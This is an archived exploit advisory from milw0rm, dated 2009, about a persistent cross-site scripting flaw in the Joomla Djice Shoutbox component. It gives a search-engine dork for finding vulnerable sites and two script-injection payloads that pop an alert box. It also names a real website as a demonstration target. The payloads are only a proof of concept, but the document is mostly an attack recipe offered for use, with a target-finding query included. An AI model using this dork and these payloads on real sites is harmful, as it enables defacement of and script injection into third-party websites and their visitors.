25 lines
612 B
Text
Executable file
25 lines
612 B
Text
Executable file
############################################
|
|
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
|
|
############################################
|
|
|
|
- dork: inurl:"index.php?option=com_djiceshoutbox"
|
|
|
|
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
|
|
|
|
"><script>alert('XaDoS')</script>
|
|
|
|
or
|
|
|
|
'">><script>alert('XSS By XaDoS')</script>
|
|
|
|
the XSS become permanent in every page of site!
|
|
not critical damage but it's not funny..
|
|
|
|
[+] D3M0:
|
|
|
|
http://www.djiceatwork.com
|
|
|
|
contact me at xados @ hotmail . it
|
|
www.securitycode.it
|
|
|
|
# milw0rm.com [2009-03-10]
|